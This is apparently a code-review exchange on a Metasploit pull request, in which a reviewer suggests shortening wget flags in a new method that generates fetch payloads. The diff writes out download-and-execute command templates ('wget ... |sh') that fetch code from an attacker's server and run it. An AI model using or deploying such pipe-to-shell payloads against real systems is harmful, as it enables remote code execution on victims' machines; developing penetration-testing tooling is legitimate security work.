lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -342,6 +397,17 @@ def _generate_wget_command
     _execute_add(get_file_cmd)
   end
 
+  def _generate_wget_pipe
+    case fetch_protocol
+    when 'HTTPS'
+      return "wget --no-check-certificate -qO - https://#{_download_pipe}|sh"
+    when 'HTTP'
+      return "wget -qO - http://#{_download_pipe}|sh"
+    else
```

Comment:
```suggestion
    when 'HTTPS'
      return "wget --no-check-certificate -qO- https://#{_download_pipe}|sh"
    when 'HTTP'
      return "wget -qO- http://#{_download_pipe}|sh"
    else
```

According to the manpage:

>    -O, --output-document=file
       The documents will not be written to the appropriate files, but all will be concatenated together and written to file.  If - is used as file, documents will be printed to standard output, disabling link conversion.  Use ./- to print to a file literally named -.  To not get Wget2 status messages mixed with  file
       content, use -q in combination with -O- (This is different to how Wget 1.x behaves).

Saving one char, yay!

Reply:
I'll take it!